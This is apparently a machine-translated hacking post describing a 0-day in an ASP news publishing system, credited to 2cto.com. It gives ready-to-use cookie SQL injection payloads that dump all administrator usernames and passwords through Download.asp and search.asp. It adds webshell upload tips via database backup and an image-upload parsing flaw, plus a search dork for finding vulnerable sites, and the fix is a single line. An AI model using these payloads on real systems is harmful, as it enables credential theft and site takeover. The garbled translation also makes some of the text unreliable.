Cutting-edge cutting-edge news and publishing system ACC and SQL versions to inject 0-day and fix

Code: javascript: alert (document. cookie = "BigClassName =" + escape ("% 25 and 1 = 2 union select 1, admin, 3, password, 5, 6, 7, 8, 9, 10, 11, 12, 13 from admin where 1 = 1 and a = "));

Open the http: // localhost/Download. asp page, use the above Code in the IE Address Bar of the first page, and then access http: // localhost/Download. asp? Page, refresh once, all the administrator accounts and passwords in the system are listed.
========================================================== ===

Use the code: javascript: alert (document. cookie = "key =" + escape ("% 25% 25 and 1 = 2 union select admin, password, 25% from admin where 1 = 1 and aleave like % 25 "));

Access http: // localhost/search. asp if the search. asp page exists? Otype = title & key = xx, enter the above Code in the IE address bar, and then access http: // localhost/search. asp? Otype = title & page, refresh, all management account and password of the same system are exposed.

======================================

It is very easy to use webshell in the background, database backup, and resolution vulnerability in uploading image programs when adding news. If you are lucky, you can also see the next upload image program page in the root directory: Upload_Photo.asp, this page must be logged on to the background before it can be used. The method of using this page is as follows, as for the final achievements, it depends on whether the server parses the cer !!
Put a keyword: Powered By OYAYA. CN inurl: download. asp

 

Www.2cto.com repair policy: Delete unnecessary IIs resolution suffix